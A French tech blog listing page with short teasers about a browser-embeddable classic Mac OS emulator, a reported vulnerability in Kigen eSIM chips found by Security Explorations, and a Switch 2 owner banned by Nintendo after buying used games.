Son projet, qui permet déjà d’émuler tous les Mac OS de 1984 à 2005 directement dans le navigateur, peut maintenant être intégré dans n’importe quelle page web. Genre comme une vidéo YouTube, mais avec un Mac dedans.
Très mauvaise nouvelle les amis… Des chercheurs polonais viennent de péter la sécurité des eSIM et ça fait froid dans le dos puisqu’on parle de 2 milliards de puces compromises qui permettent de cloner votre carte SIM à distance.
L’équipe de Security Explorations, un labo de recherche en sécurité basé en Pologne, vient en effet de publier leurs trouvailles et c’est pas joli joli puisqu’ils ont réussi à exploiter une vulnérabilité dans les puces eSIM de Kigen, un des plus gros fournisseurs du marché.
Encore une histoire qui m’a fait halluciner… Raz le bol de Nintendo car je viens d’apprendre qu’un utilisateur de la toute nouvelle Switch 2 s’est retrouvé banni du service en ligne de Nintendo après avoir eu le culot… d’acheter des jeux d’occasion sur Facebook Marketplace. Oui, des jeux légitimes, achetés en toute légalité, mais d’occasion. Le crime du siècle, apparemment.
L’affaire nous vient d’un certain dmanthey sur Reddit qui raconte sa mésaventure. Le gars achète tranquillement 4 jeux Switch 1 d’occase sur Facebook, les insère dans sa Switch 2 flambant neuve, lance les mises à jour et va se coucher. Le lendemain matin, surprise ! Son compte est banni des services en ligne. Nintendo a décidé que c’était louche et paf, sanction directe.
